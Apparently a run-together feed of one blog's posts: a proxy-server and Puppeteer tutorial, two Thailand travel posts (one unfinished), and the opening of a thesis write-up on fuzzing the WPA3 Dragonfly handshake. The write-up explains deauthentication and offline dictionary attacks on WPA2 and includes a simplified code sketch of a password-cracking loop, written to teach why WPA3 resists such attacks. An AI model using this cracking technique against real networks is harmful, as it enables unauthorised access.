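```javascript
const http = require('http');

// Builds the options for http.request() so that the request is sent to the
// proxy with the absolute target URL as request path (a classic http proxy request).
function buildProxyRequestOptions(proxyUrl, targetUrl) {
  const proxy = new URL(proxyUrl);
  const target = new URL(targetUrl);
  const headers = { Host: target.host };
  if (proxy.username) {
    // Basic proxy authentication: base64 of "username:password".
    const credentials = `${decodeURIComponent(proxy.username)}:${decodeURIComponent(proxy.password)}`;
    headers['Proxy-Authorization'] = `Basic ${Buffer.from(credentials).toString('base64')}`;
  }
  return {
    host: proxy.hostname,
    port: Number(proxy.port),
    method: 'GET',
    path: target.href,
    headers,
  };
}

// Sends the request through the proxy and resolves with status code and body.
function fetchThroughProxy(proxyUrl, targetUrl) {
  return new Promise((resolve, reject) => {
    const req = http.request(buildProxyRequestOptions(proxyUrl, targetUrl), (res) => {
      let body = '';
      res.setEncoding('utf8');
      res.on('data', (chunk) => { body += chunk; });
      res.on('end', () => resolve({ statusCode: res.statusCode, body }));
    });
    req.on('error', reject);
    req.end();
  });
}

// Possible usage:
//   fetchThroughProxy('http://proxyuser:proxypass@100.100.100.100:3128', 'http://ipinfo.io/json')
//     .then(({ statusCode, body }) => console.log(statusCode, body));
```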
<h3>Configuring a socks proxy server with danted</h3>
<p>In order to create a socks4/socks5 server, we will use <a href="https://www.inet.no/dante/">dante</a>. <strong>dante</strong> is the name of the software, <code>danted</code> stands for <em>dante daemon</em>.</p>
<p>First we show how to configure <code>danted</code> to create a socks4 proxy server, then how to set up socks5. The difference between socks4 and socks5 is essentially that socks5 supports <code>username:password</code> authentication.</p>
<p>In order to begin, you need to install a recent <code>danted</code> server. This has been explained countless times: <a href="https://gist.github.com/gpchelkin/c7d24a21639d1f120fb082d1801a5fe4">Here are decent installation instructions</a>.</p>
<p>After you installed <code>danted</code>, add this configuration to <code>/etc/danted.conf</code>:</p>
<div class="highlight"><pre><span></span><code><span class="c1"># /etc/danted.conf</span>
logoutput: syslog
user.privileged: root
user.unprivileged: nobody
<span class="c1"># The listening network interface or address.</span>
internal: <span class="m">0</span>.0.0.0 <span class="nv">port</span><span class="o">=</span><span class="m">53425</span>
<span class="c1"># The proxying network interface or address.</span>
external: eth0
<span class="c1"># socks-rules determine what is proxied through the external interface.</span>
<span class="c1"># The default of "none" permits anonymous access.</span>
socksmethod: username
<span class="c1"># client-rules determine who can connect to the internal interface.</span>
<span class="c1"># The default of "none" permits anonymous access.</span>
clientmethod: none
client pass <span class="o">{</span>
from: <span class="m">1</span>.1.1.1/16 to: <span class="m">0</span>.0.0.0/0
log: connect disconnect error
<span class="o">}</span>
socks pass <span class="o">{</span>
from: <span class="m">0</span>.0.0.0/0 to: <span class="m">0</span>.0.0.0/0
log: connect disconnect error
<span class="o">}</span>
</code></pre></div>
<p>In my case, I needed to change the external network interface to <strong>ens3</strong>. You can look it up with the <code>ifconfig</code> command.</p>
<p><code>danted</code> authenticates against the usernames and passwords of the linux users on the server. Therefore, we create a user with:</p>
<div class="highlight"><pre><span></span><code><span class="c1"># add user</span>
useradd -r -s /bin/false proxyuser
<span class="c1"># set password</span>
passwd proxyuser
</code></pre></div>
<p>Now open the port in the firewall with:</p>
<div class="highlight"><pre><span></span><code>ufw allow <span class="m">53425</span>
</code></pre></div>
<p>Finally, we restart <code>danted</code> with the command <code>service danted restart</code>.</p>
<p>Confirm that the socks server is working by testing it with curl:</p>
<div class="highlight"><pre><span></span><code>curl --proxy socks5://proxyuser:proxypass@100.100.100.100:53425 http://ipinfo.io/json
</code></pre></div>
<p>If we <strong>do not want to use socks authentication</strong>, we edit <code>/etc/danted.conf</code> to alter the line from <code>socksmethod: username</code> to <code>socksmethod: none</code> and issue the command <code>service danted restart</code>.</p>
<p>Then we can test the socks server without auth (which is <strong>socks4</strong>) with:</p>
<div class="highlight"><pre><span></span><code>curl --proxy socks4://100.100.100.100:53425 http://ipinfo.io/json
</code></pre></div>
<h2>Puppeteer with proxies</h2>
<p>Now we can see how to use the http/s and socks proxy server that we configured in the previous steps with a fully functional browser controlled via puppeteer.</p>
<h3>Puppeteer with http/s proxy</h3>
<p>You can test puppeteer with a http proxy by launching the following node script. The output should show IP address details of the proxy.</p>
<div class="highlight"><pre><span></span><code><span class="kd">const</span> <span class="nx">puppeteer</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'puppeteer'</span><span class="p">);</span>
<span class="p">(</span><span class="k">async</span><span class="p">()</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">proxyUrl</span> <span class="o">=</span> <span class="s1">'http://100.100.100.100:3128'</span><span class="p">;</span>
<span class="kd">const</span> <span class="nx">browser</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">puppeteer</span><span class="p">.</span><span class="nx">launch</span><span class="p">({</span>
<span class="nx">args</span><span class="o">:</span> <span class="p">[</span><span class="sb">`--proxy-server=</span><span class="si">${</span><span class="nx">proxyUrl</span><span class="si">}</span><span class="sb">`</span><span class="p">],</span>
<span class="p">});</span>
<span class="kd">const</span> <span class="nx">page</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">newPage</span><span class="p">();</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">authenticate</span><span class="p">({</span>
<span class="nx">username</span><span class="o">:</span> <span class="s1">'proxyuser'</span><span class="p">,</span>
<span class="nx">password</span><span class="o">:</span> <span class="s1">'proxypass'</span>
<span class="p">});</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="kr">goto</span><span class="p">(</span><span class="s1">'https://ipinfo.io/json'</span><span class="p">);</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">screenshot</span><span class="p">({</span> <span class="nx">path</span><span class="o">:</span> <span class="s1">'ipinfo.png'</span><span class="p">,</span> <span class="nx">fullPage</span><span class="o">:</span> <span class="kc">true</span> <span class="p">});</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">content</span><span class="p">());</span>
<span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">close</span><span class="p">();</span>
<span class="p">})();</span>
</code></pre></div>
<h3>Puppeteer with socks4 proxy</h3>
<p>You can test puppeteer in combination with a socks proxy server by launching the following node program. The output should show IP address details of the proxy.</p>
<div class="highlight"><pre><span></span><code><span class="kd">const</span> <span class="nx">puppeteer</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'puppeteer'</span><span class="p">);</span>
<span class="p">(</span><span class="k">async</span><span class="p">()</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">proxyUrl</span> <span class="o">=</span> <span class="s1">'socks://100.100.100.100:53425'</span><span class="p">;</span>
<span class="kd">const</span> <span class="nx">browser</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">puppeteer</span><span class="p">.</span><span class="nx">launch</span><span class="p">({</span>
<span class="nx">args</span><span class="o">:</span> <span class="p">[</span><span class="sb">`--proxy-server=</span><span class="si">${</span><span class="nx">proxyUrl</span><span class="si">}</span><span class="sb">`</span><span class="p">],</span>
<span class="p">});</span>
<span class="kd">const</span> <span class="nx">page</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">newPage</span><span class="p">();</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="kr">goto</span><span class="p">(</span><span class="s1">'https://ipinfo.io/json'</span><span class="p">);</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">screenshot</span><span class="p">({</span> <span class="nx">path</span><span class="o">:</span> <span class="s1">'ipinfo.png'</span><span class="p">,</span> <span class="nx">fullPage</span><span class="o">:</span> <span class="kc">true</span> <span class="p">});</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">content</span><span class="p">());</span>
<span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">close</span><span class="p">();</span>
<span class="p">})();</span>
</code></pre></div>
<h2>Tear down the proxy servers</h2>
<p>To stop the proxy servers, execute the following commands on your servers:</p>
<div class="highlight"><pre><span></span><code>systemctl stop danted
systemctl stop squid
</code></pre></div>
<h2>Known Limitations</h2>
<p>Unfortunately, <strong>it is not possible to use puppeteer/chromium with an authenticated socks5 proxy</strong>. The chrome browser does not support socks with authentication.</p>
<p>How to address the problem of <a href="https://incolumitas.com/2020/02/14/dynamically-changing-puppeteer-http-proxy/">switching proxies on the fly</a> without restarting puppeteer/chromium will be handled in the next blog post.</p>5 crucial tips how to survive riding a motorbike/scooter in Thailand (2019)2019-10-26T19:04:00+02:002019-10-26T19:04:00+02:00Nikolai Tschachertag:incolumitas.com,2019-10-26:/2019/10/26/5-crucial-tips-how-to-survive-riding-a-motorbike-in-thailand/<p>Thailand is the second most deadly country when it comes to traffic accidents. 80% of all deaths originate from people driving motorbikes. In this blog post, I try to share my experiences in the form of 5 survival tips in an honest way. I drove a scooter at 4 distinct tourist destinations in Thailand without a proper license and wasn't caught at a police checkpoint a single time.</p><p>After Libya, <a href="http://www.thaiwebsites.com/caraccidents.asp">Thailand is the second most deadly country in the world</a> by number of road accident deaths. A large share of casualties originates from motorcycle accidents. During my three-week trip through Thailand's beautiful nature, I rented a motorbike at the following tourist destinations in Thailand:</p>
<ol>
<li>Koh Tao</li>
<li>Koh Phangan</li>
<li>Krabi</li>
<li>Koh Lanta</li>
</ol>
<p>and managed to survive without an injury (fingers crossed, because I haven't left yet).</p>
<p>During my journey in Thailand, I spoke with a hostel manager who told me about his employee who died a couple of months earlier in a motorbike accident. The next day in the same hostel, when I crossed the road to the motorbike rental shop, the British owner told me that he had just picked up a destroyed bike from an accident earlier that day. The driver was hospitalized with broken legs and wounds.</p>
<p>When I stayed in Koh Lanta, my bungalow neighbors, two Swiss girls, had a motorbike accident: they lost control of their bike because of wheel ruts and potholes. The driver suffered a deep cut on her leg and needed seven stitches. The medical bill wasn't the problem, but the shock must have been deep. It was the beginning of their one year journey around the world. I don't think they will rent a new scooter that quickly.</p>
<p>When traveling with ferries, you see lots of tourists. It is very common to see tourists with bandages on their legs and arms. They are so-called <strong>island tattoos</strong>.</p>
<p>But if Thailand is so freaking dangerous for motorcyclists, why even expose yourself to the risk?</p>
<p>Well, there are a couple of good reasons why it is an alluring idea to drive a scooter in Thailand.</p>
<ol>
<li>You are flexible and you can visit any amazing beach, restaurant or viewpoint on any island.</li>
<li>Driving a motorbike is a hugely liberating feeling. It's thoroughly enjoyable to cruise through steep island roads on Koh Tao or to visit the non-touristy northern part of Koh Lanta Noi.</li>
<li>Practical reasons: You won't need to pay for transport. Tuk-tuks are very expensive and you often get ripped off by the local taxi men.</li>
<li>Renting a motorbike is very cheap. Prices are as low as 150 baht per day (4 dollars).</li>
</ol>
<p>What follows are five crucial tips on how to survive riding a motorbike in Thailand.</p>
<ol>
<li>Wear a fucking helmet</li>
</ol>
<p>Statistics speak a clear language. When you drive long enough on Thailand's roads, you will be involved in an accident. It goes without saying that if you do not wear a helmet, your probability of dying or suffering a serious injury is much higher compared to wearing a proper helmet.</p>
<p>I saw so many tourists that did not wear a helmet. It's a fucking mystery to me why. I didn't study so many years in university to get my head crushed on a Thai road. Furthermore, wearing an (open face) helmet is not even a discomfort.</p>
<p>Always wear a fucking helmet. Even better, choose a proper helmet. There are <a href="https://www.fortamoto.com/motorcycle-helmets/helmet-types/">different types of helmets</a>. So if you have a choice, always go for the <strong>full face helmet</strong>. In most cases, the motorbike rental places will only offer <strong>open face helmets</strong>, which offer reduced protection. However, any helmet is better than none.</p>
<ol start="2">
<li>Ride predictably</li>
</ol>
<p>This does not mean that you should drive slowly. Sometimes it's best to drive in a predictable, conformist fashion.</p>
<p>In my experience, most Thai motorcyclists do not drive very fast. They usually ride no faster than 40 km/h and at the very edge of the road.</p>
<ol start="3">
<li>When you are a beginner, do not take one bike for two people.</li>
</ol>
<p>This might be counterintuitive.</p>
<ol start="4">
<li>Be aware of sand and dirt in curves and potholes on roads</li>
</ol>
<p>5.</p>
<h3>References</h3>
<p>https://mythailand.blog/2019/06/11/driving-a-scooter-in-thailand/</p>4 reasons why you should NOT travel to Koh Phi Phi2019-10-22T19:04:00+02:002019-10-22T19:04:00+02:00Nikolai Tschachertag:incolumitas.com,2019-10-22:/2019/10/22/4-reasons-why-you-should-not-travel-to-koh-phi-phi/<p>In this quick blog post I outline why you probably don't want to go to Koh Phi Phi.</p><p>Koh Phi Phi and Koh Samui are two infamous Thai islands that I was aware of before I set foot in Thailand. Honestly, I didn't bother reading blog posts or reviews about the island before I decided to travel from Krabi Town to Koh Phi Phi by the public ferry. The famous name <strong>Koh Phi Phi</strong> was reason enough to give it a try. In hindsight, I wish I had informed myself, because <strong>I cannot recommend visiting this place at all</strong>.</p>
<p>What follows are four reasons why you probably should not include Koh Phi Phi as a destination in your journey.</p>
<h2>1. Koh Phi Phi is polluted and the beaches are dirty</h2>
<p>Koh Phi Phi has a notorious waste problem. The very first thing every unsuspecting visitor is required to do after arriving on the island is to pay 20 baht towards a common fund that goes to a waste disposal company that is supposed to get rid of the trash that quickly accumulates on the island.</p>
<p>However, it seems that the company doesn't do a perfect job. There is trash to be seen everywhere on the island. It would be too far-fetched to speak of a <strong>trash island</strong>, but Koh Phi Phi definitely has a problem with waste on the beach and illegal waste dumps in nature. The pictures below unfortunately prove my point:</p>
<figure>
<img src="https://incolumitas.com/images/koh-phi-phi/trash/yellow-plastic.jpg" alt="yellow trash" style="width: 100%" />
<figcaption>Yellow plastic bag in the water on the Koh Phi Phi beach.</figcaption>
</figure>
<figure>
<img src="https://incolumitas.com/images/koh-phi-phi/trash/trash-dumped.jpg" alt="trash" style="width: 100%" />
<figcaption>Trash dumped in nature around Tonsai Bay on Koh Phi Phi.</figcaption>
</figure>
<figure>
<img src="https://incolumitas.com/images/koh-phi-phi/trash/waste-beach.jpg" alt="waste on the beach" style="width: 100%" />
<figcaption>Random waste dumped on the beach of Koh Phi Phi island.</figcaption>
</figure>
<h2>2. Koh Phi Phi is heavily overcrowded and way too touristy</h2>
<p>The small sand strip of the island where you actually are allowed to freely move is packed with thousands of shops that sell unnecessary stuff. Countless tourists from all over the world stay in the many hundreds of hotels and resorts on the small sand strip named Tonsai Bay. In the evening, there is a horrific party with comically bad and way too loud music with young people drinking their expensive buckets.</p>
<p>The very first thing you see when you arrive on the island is a Burger King and a McDonald's. It requires a significant effort in evilness to plant those fast food chains directly on the arrival pier.</p>
<figure>
<img src="https://incolumitas.com/images/koh-phi-phi/fast-food.jpg" alt="fast food restaurants" style="width: 100%" />
<figcaption>Fast food chains on Koh Phi Phi.</figcaption>
</figure>
<p>When you walk through the narrow streets on Koh Phi Phi, you have countless opportunities to waste your money. The vendors constantly harass you and try to relieve you of the heavy burden that your money seems to pose.</p>
<figure>
<img src="https://incolumitas.com/images/koh-phi-phi/shops.jpg" alt="lots of shops in koh phi phi" style="width: 100%" />
<figcaption>Endless shops that are selling unnecessary stuff.</figcaption>
</figure>
<h2>3. You are imprisoned in Tonsai Bay</h2>
<p>Koh Phi Phi consists of two mountainous parts which are connected by a roughly 1 km long flat sand bank. This sand bank named Tonsai Bay harbors almost all hostels and hotels on the island. There is no real possibility to discover the other large parts of the island. There are no trails or paths that lead to the hilly and rain-forested area of the island.</p>
<p>Put differently, there is no realistic way to flee the heavily populated main town of the island - other than by paying an expensive taxi long-tail boat.</p>
<figure>
<img src="https://incolumitas.com/images/koh-phi-phi/tonsai-bay.jpg" alt="Tonsai Bay" style="width: 100%" />
<figcaption>Overview of Tonsai Bay from the Viewpoint (that costs 30 baht)</figcaption>
</figure>
<p>For instance, in order to visit <em>Monkey Beach</em>, the taxi boats charge between 600 and 700 baht for two persons, which equals roughly $12 per person. This boat ride costs way too much. In comparison, the trip from Ao Nang Beach to Railay Beach in Krabi costs only 100 baht, although both trips cover more or less the same distance.</p>
<p>Therefore, if you are not willing to pay a large fee to visit all the other small islands around Tonsai Bay, you are <strong>basically imprisoned</strong> on Koh Phi Phi. It wouldn't have been straightforward to create a trail into the hilly Koh Phi Phi island, but it certainly isn't impossible. But then, there wouldn't be a way to overcharge the tourists so effortlessly. So there's that. Don't visit Koh Phi Phi if you are not willing to pay large amounts of money for transportation by water.</p>
<h2>4. Everything is too expensive on Koh Phi Phi</h2>
<p>I do understand that Koh Phi Phi must be more expensive compared to the mainland and that there is no way to realistically change this, but if you are traveling on a low budget, you should definitely not go to Koh Phi Phi. It's not worth the money. For example, a 1.5l bottle of water costs 28 baht in Tonsai Bay compared to 18 baht on the mainland.</p>
<p>Accommodation is nearly double the price compared to other islands. Koh Tao is roughly the same size as Koh Phi Phi, but has way more moderate prices. We were lucky that we visited the island in the off-season, otherwise we would have needed to continue our trip on a diet of bread and water and without accommodation.</p>
<h2>The good things on Koh Phi Phi</h2>
<p>Let's try to be not so negative for once.</p>
<p>Of course Koh Phi Phi is still a beautiful island after all. For example, the sunset from the viewpoint is definitely worth experiencing.</p>
<figure>
<img src="https://incolumitas.com/images/koh-phi-phi/sunset.jpg" alt="Sunset in Koh Phi Phi" style="width: 100%" />
<figcaption>Sunset seen from the Viewpoint on Koh Phi Phi</figcaption>
</figure>
<p>The very best thing on Koh Phi Phi is the abundance of cats that live on the island. Almost every Thai family owns a cat and they are treated very well. I petted around 20 cats during my one and a half days on the island and it was worth every single pet.</p>
<figure>
<img src="https://incolumitas.com/images/koh-phi-phi/cat1.jpg" alt="Cat in Koh Phi Phi" style="width: 100%" />
<figcaption>Adorable cat eyes</figcaption>
</figure>
<figure>
<img src="https://incolumitas.com/images/koh-phi-phi/cats.jpg" alt="More Cats" style="width: 100%" />
<figcaption>Two beautiful cats chilling on Koh Phi Phi</figcaption>
</figure>
<p>Furthermore, on a more personal note, I met a lot of friendly and amazing people on the island. The Thai inhabitants are relaxed and always friendly and helpful. We met a French couple that had been traveling for years. They were extremely likable and I realized then and there how traveling can transform you into a better version of yourself.</p>Model Based fuzzing of the WPA3 Dragonfly Handshake2019-10-19T17:18:00+02:002019-10-19T17:18:00+02:00Nikolai Tschachertag:incolumitas.com,2019-10-19:/2019/10/19/model-based-fuzzing-of-the-WPA3-dragonfly-handshake/<p>The results of my Master thesis named <em>Model based fuzzing of the WPA3 Dragonfly handshake</em> are briefly discussed in this blog post. No severe vulnerabilities were discovered, mostly due to the limited deployment of WPA3 hardware since its introduction. However, a DoS vulnerability in <code>iwd</code> was found.</p><p>Here is a quick link to <a href="https://incolumitas.com/data/dragonfly-fuzzing-wpa3.pdf"><strong>download my Master Thesis about fuzzing the WPA3 handshake</strong></a>.</p>
<p>In the past couple of months, I completed my Master thesis at <a href="https://www.hu-berlin.de/en/">Humboldt University</a> and thus finalized my computer science degree.</p>
<p>The aim of this scientific thesis was to find a suitable approach to systematically fuzz the new WPA3 Dragonfly handshake that is plugged in front of the quite old WPA 4-Way handshake. The research yielded different fuzzing policies and I learned a lot about systematically fuzzing complex software projects.</p>
<h3>Why do we even require a third WPA version?</h3>
<p>The purpose of the now 15-year-old 4-way handshake of WPA and WPA2 is to establish a so-called Pairwise Transient Key (PTK) that is used to encrypt and decrypt all traffic between the client (supplicant) and the access point (authenticator). With WPA-PSK (pre-shared key), a password that both the supplicant (for example your mobile phone) and the authenticator (the router that sits in your apartment) possess is used to derive the PTK in a sequence of 4 EAPOL key frames.</p>
<p>This old 4-way handshake is still reasonably secure when used with high entropy passwords. However, we human beings tend to use easily guessable low entropy passwords such as <em>baconbacon</em>, which is the WiFi password that my hostel uses in Krabi/Thailand from where I am writing this blog post.</p>
<p>The classic 4-way handshake is susceptible to offline dictionary attacks. Furthermore, since deauthentication frames are not encrypted and can easily be spoofed (which means that you can pretend to be a network participant who you are not), it is possible to deauthenticate a client from the access point, observe the network and wait until the client reconnects with the access point and capture and record the key material that is exchanged.</p>
<p>With this collected key exchange material it is feasible to launch an offline dictionary attack against the password. In practice, this means you upload a highly optimized cracking program to the AWS cloud and pay a couple of hundred dollars to enumerate all wordlist passwords, some rainbow tables and probably all combinations of lowercase alphanumeric strings up to 8 characters.</p>
<p>With WPA3, this offline dictionary attack and deauthentication attack are no longer feasible.</p>
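<p>To make the word <em>offline</em> concrete, here is a minimal sketch of such a dictionary attack. The PMK derivation (PBKDF2-HMAC-SHA1 over passphrase and SSID, 4096 iterations, 32 bytes) is the one WPA/WPA2-PSK uses. Everything else is an assumption for illustration: <code>handshakeTag</code> is a simplified stand-in for the MIC of a captured EAPOL frame (the real check first derives the PTK from nonces and MAC addresses), and the SSID, transcript and wordlist are made up.</p>

```javascript
const crypto = require('crypto');

// WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
function derivePmk(passphrase, ssid) {
  return crypto.pbkdf2Sync(passphrase, ssid, 4096, 32, 'sha1');
}

// ASSUMPTION: simplified stand-in for the MIC found in a captured handshake.
// A real attack derives the PTK from nonces and MAC addresses first.
function handshakeTag(pmk, transcript) {
  return crypto.createHmac('sha1', pmk).update(transcript).digest('hex');
}

// Every guess is verified locally against the capture.
// The access point never sees a single one of these attempts.
function dictionaryAttack(capturedTag, transcript, ssid, wordlist) {
  for (const candidate of wordlist) {
    const tag = handshakeTag(derivePmk(candidate, ssid), transcript);
    if (tag === capturedTag) {
      return candidate;
    }
  }
  return null;
}

// Hypothetical capture, generated here so that the sketch is self-contained.
const ssid = 'HostelWifi';
const transcript = 'anonce|snonce|ap-mac|client-mac';
const capturedTag = handshakeTag(derivePmk('baconbacon', ssid), transcript);

const wordlist = ['password', '12345678', 'baconbacon', 'letmein123'];
console.log(dictionaryAttack(capturedTag, transcript, ssid, wordlist));
```

<p>The loop needs nothing but the capture and CPU time, which is why low entropy passwords fall so quickly and why the guessing rate cannot be limited by the access point.</p>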
<figure>
<img src="https://incolumitas.com/images/dragon_overview.png" alt="Dragonfly Overview" style="width: 100%" />
<figcaption>The complete model of the WPA3-SAE handshake, including announcing beacon frames, probe request and probe response frames, association request frames and the finalizing 4-way handshake.
</figcaption>
</figure>
<h5>Security Properties of Dragonfly</h5>
<p>This new Simultaneous Authentication of Equals handshake (another name for the Dragonfly handshake), which was originally standardized in 2011, adds two security properties to Wi-Fi’s original 4-way handshake:</p>
<ol>
<li><strong>Forward secrecy</strong>. Attackers cannot decrypt previously recorded traffic, even if they later learn the password, because fresh keys are negotiated in every new instance of the handshake.</li>
<li><strong>Offline dictionary attack resistance</strong>. Attackers can merely launch online
attacks against the handshake. Put differently, the number of guesses from a
brute force attack grows linearly with the number of authentication attempts,
which can easily be regulated by the authenticator.</li>
</ol>
<p>Put differently, the Dragonfly handshake is a so-called <strong>PAKE</strong> scheme that forces anyone who wants to test a password guess to do so <em>online</em>. Online in this context means that it's impossible to capture viable key material in order to crack it offline. PAKE stands for Password Authenticated Key Exchange and one important property of PAKE schemes is that they securely exchange a key while simultaneously authenticating both participants.</p>
<p>It's the same principle as with the well-known Diffie-Hellman key exchange, except that the exchange is authenticated, which means that only two parties that share a common key are able to exchange a key.</p>
<figure>
<img src="https://incolumitas.com/images/handshake_dragonfly.png" alt="Dragonfly Handshake" style="width: 100%" />
<figcaption>High-level overview of the SAE commit and confirm handshake.
</figcaption>
</figure>
<p>Therefore, the sole purpose of the Dragonfly key exchange is to take the PSK as input and construct a common base element in a discrete logarithm group (such as elliptic curves or multiplicative groups modulo a prime <em>p</em>). The plaintext password (PSK) and some large random numbers are the ingredients used to derive the common base element and, from it, a high-entropy shared key, the <strong>PMK</strong>, that is used as an input to the old 4-way handshake.</p>
<p>Because the random numbers change in every iteration of the Dragonfly protocol, the PMK is unique for each new instance of the handshake. Now, it's easy to see why an offline dictionary attack is infeasible and why forward secrecy is guaranteed.</p>
<p>Why did the inventor of Dragonfly - Dan Harkins - not simply use an existing PAKE protocol? The reason was licensing issues with the original <a href="https://en.wikipedia.org/wiki/SPEKE">SPEKE</a> protocol.</p>
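<p>The idea of a password-derived base element can be sketched with a toy exchange in the style of SPEKE. This is explicitly <em>not</em> the Dragonfly algorithm (there is no hunting-and-pecking, no commit/confirm frames, no elliptic curve), and the group modulo 2^127 - 1 is an assumption chosen only to keep the numbers small. The function names are made up for this sketch.</p>

```javascript
const crypto = require('crypto');

// ASSUMPTION: toy group, integers modulo the Mersenne prime 2^127 - 1.
// Not a secure parameter choice, for illustration only.
const P = (1n << 127n) - 1n;

// Square-and-multiply modular exponentiation on BigInts.
function modPow(base, exp, mod) {
  let result = 1n;
  base %= mod;
  while (exp > 0n) {
    if (exp & 1n) result = (result * base) % mod;
    base = (base * base) % mod;
    exp >>= 1n;
  }
  return result;
}

// Both sides map the shared password to the same base element: g = H(password)^2 mod P.
function passwordToBase(password) {
  const digest = crypto.createHash('sha256').update(password).digest('hex');
  const h = BigInt('0x' + digest) % P;
  return (h * h) % P;
}

// Fresh random secret for every run of the handshake.
function randomScalar() {
  return BigInt('0x' + crypto.randomBytes(16).toString('hex')) + 2n;
}

// Value sent over the air: g^secret mod P.
function publicValue(password, secret) {
  return modPow(passwordToBase(password), secret, P);
}

// Key computed locally from the peer's public value.
function sharedKey(peerPublic, secret) {
  return modPow(peerPublic, secret, P);
}

const clientSecret = randomScalar();
const apSecret = randomScalar();
const clientPublic = publicValue('baconbacon', clientSecret);
const apPublic = publicValue('baconbacon', apSecret);

// Same password on both sides: both derive the same key.
console.log(sharedKey(apPublic, clientSecret) === sharedKey(clientPublic, apSecret));

// A peer that guessed the wrong password ends up with an unrelated key.
const wrongPublic = publicValue('hunter2hunter2', apSecret);
console.log(sharedKey(wrongPublic, clientSecret) === sharedKey(clientPublic, apSecret));
```

<p>An eavesdropper only sees the two public values. Testing a password guess against them would require the random secrets, so every guess has to be tried in a live handshake, and because the secrets are fresh each time, every run yields a different key.</p>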
<h3>What is fuzzing?</h3>
<p>Fuzzing is a testing strategy whose intention is to uncover security vulnerabilities in the software under test. It is the process of <em>repeatedly running a program with generated inputs that may be syntactically or semantically malformed</em>.</p>
<p>A possible definition of fuzzing, as Valentin et al. understand it, is <em>the execution of the program under test using inputs sampled from an input space that protrudes the expected input space of the program under test</em>.</p>
<p>In my master thesis, I mostly used a <strong>blackbox fuzzing approach</strong> and a <strong>greybox fuzzing approach</strong>.</p>
<h5>Blackbox fuzzing</h5>
<p>In blackbox fuzzing, the logic and internal behavior of the fuzzed program is largely unknown. A blackbox fuzzer merely observes the input/output behavior of the program under test, thus treating the targeted software as a black box.</p>
<p>An example of a blackbox fuzzing test is the generation of a large corpus of fuzzed jpeg files and uploading them to an arbitrary web jpeg compression service and observing if the service crashes in an unexpected way, typically revealed by 500 internal server error responses. Most traditional fuzzers have been blackbox fuzzers.</p>
<h5>Coverage-guided greybox-fuzzing</h5>
<p>Coverage-guided greybox-fuzzing (CGF) uses lightweight binary program instrumentation to trace the code coverage reached by fuzzed input mutations.</p>
<p>Greybox fuzzers typically obtain limited information about the internals and semantics of the program under test, such as performing lightweight static analysis or collecting dynamic information about code coverage by instrumenting the code at compile time.</p>
<p>In order to instrument programs, greybox fuzzing engines inject a few instructions right after every conditional jump. Those instructions are called trampolines and their purpose is to assign a unique identifier to the current branch and increment a coarse counter belonging to the branch. The counter is implemented as a probabilistic data structure such as a count-min sketch or Bloom filter. This instrumentation enables the fuzzer to keep track of which branches are executed and how often. The instrumentation is applied at compile-time to the program under evaluation.</p>
<p>When the greybox fuzzing engine learns that a specifically mutated seed input explored previously unknown code paths, it adds the modified seed to a growing seed corpus. In other words, greybox fuzzers leverage coverage feedback information to find new inputs that reach deeper into the program.</p>
<p>CGF does not require manual program analysis, thus being more scalable and parallelizable compared to whitebox fuzzing strategies. Put differently, CGF fuzzing engines combine
various powerful concepts to yield efficient fuzzing campaigns.</p>
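<p>The feedback loop described above can be sketched in a few lines. This is a toy and not how AFL or libFuzzer are implemented: the target, its hand-placed <code>hit()</code> calls (standing in for compiler-inserted instrumentation) and the function names are assumptions for illustration, and instead of random mutations the sketch walks every value of every byte so that the run is reproducible.</p>

```javascript
// Toy target with hand-placed instrumentation: each branch bumps its own counter.
function target(input, hits) {
  const hit = (id) => hits.set(id, (hits.get(id) || 0) + 1);
  hit('entry');
  if (input[0] === 0x53) {        // 'S'
    hit('byte0');
    if (input[1] === 0x41) {      // 'A'
      hit('byte1');
      if (input[2] === 0x45) {    // 'E'
        hit('byte2');
      }
    }
  }
}

// Coverage-guided loop: an input joins the corpus only if it reaches a new branch.
function fuzz(seed) {
  const corpus = [seed];
  const seen = new Set();
  let executions = 0;

  // Runs one input and reports whether it touched a previously unseen branch.
  const run = (input) => {
    const hits = new Map();
    target(input, hits);
    executions++;
    let isNew = false;
    for (const id of hits.keys()) {
      if (!seen.has(id)) {
        seen.add(id);
        isNew = true;
      }
    }
    return isNew;
  };

  run(seed);
  // The corpus grows while we iterate over it, so new entries get mutated too.
  for (let i = 0; i < corpus.length; i++) {
    const parent = corpus[i];
    for (let pos = 0; pos < parent.length; pos++) {
      for (let value = 0; value < 256; value++) {
        const child = Uint8Array.from(parent);
        child[pos] = value;
        if (run(child)) corpus.push(child);
      }
    }
  }
  return { corpus, seen, executions };
}

const result = fuzz(Uint8Array.of(0, 0, 0));
console.log([...result.seen], result.corpus.length, result.executions);
```

<p>Because every input that unlocks one more comparison is kept and mutated further, the innermost branch is reached after 3073 executions. A blackbox fuzzer that guesses all three bytes blindly would have to search a space of 256^3 = 16,777,216 inputs.</p>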
<h3>What results did the WPA3 Dragonfly fuzzing methodology yield?</h3>
